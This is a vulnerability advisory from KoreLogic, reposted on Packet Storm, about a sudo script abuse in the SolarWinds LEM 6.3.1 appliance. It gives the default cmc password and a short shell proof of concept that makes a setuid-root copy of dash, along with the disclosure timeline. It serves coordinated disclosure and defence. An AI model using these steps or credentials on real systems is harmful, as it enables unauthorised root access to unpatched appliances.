Solarwinds LEM 6.3.1 Sudo Script Abuse Privilege Escalation

Type packetstorm
Reporter Hank Leininger
Modified 2017-04-24T00:00:00


                                            `KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse  
Title: Solarwinds LEM Privilege Escalation via Sudo Script Abuse  
Advisory ID: KL-001-2017-006  
Publication Date: 2017.04.24  
Publication URL:  
1. Vulnerability Details  
Affected Vendor: Solarwinds  
Affected Product: Log and Event Manager Virtual Appliance  
Affected Version: v6.3.1  
Platform: Embedded Linux  
CWE Classification: CWE-269: Improper Privilege Management  
Impact: Privileged Access  
Attack vector: SSH  
2. Vulnerability Description  
An attacker can abuse functionality provided by a script which  
may be run with root privilege in order to elevate privilege.  
3. Technical Description  
Should an attacker gain access to the SSH console for the  
cmc user, root access to the underlying operating system can be  
achieved. The default password for the cmc user is "password".  
The cmc account can run certain script files with root privilege.  
Listed below:  
One script, allows the user to change ownership and  
permission bits for an arbitrary file. This can be abused to  
elevate privilege to root.  
cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh  
cmc@swi-lem:/usr/local/contego/scripts$ sudo ./ setperms /tmp/koresh root root 4755  
sudo: unable to resolve host swi-lem  
cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh  
# id  
uid=1001(cmc) gid=1000(trigeo) euid=0(root)  
4. Mitigation and Remediation Recommendation  
The vendor has released a Hotfix to remediate this  
vulnerability. Hotfix and installation instructions are  
available at:  
5. Credit  
This vulnerability was discovered by Hank Leininger and Matt  
Bergin (@thatguylevel) of KoreLogic, Inc.  
6. Disclosure Timeline  
2017.02.16 - KoreLogic sends vulnerability report and PoC to  
Solarwinds <> using PGP key  
with fingerprint  
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.  
2017.02.20 - Solarwinds replies that the key is no longer in  
use, requests alternate communication channel.  
2017.02.22 - KoreLogic submits vulnerability report and PoC to  
alternate Solarwinds contact.  
2017.02.23 - Solarwinds confirms receipt of vulnerability  
2017.04.06 - 30 business days have elapsed since Solarwinds  
acknowledged receipt of vulnerability details.  
2017.04.11 - Solarwinds releases hotfix and public disclosure.  
2017.04.24 - KoreLogic public disclosure.  
7. Proof of Concept  
See 3. Technical Description  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
Our public vulnerability disclosure policy is available at: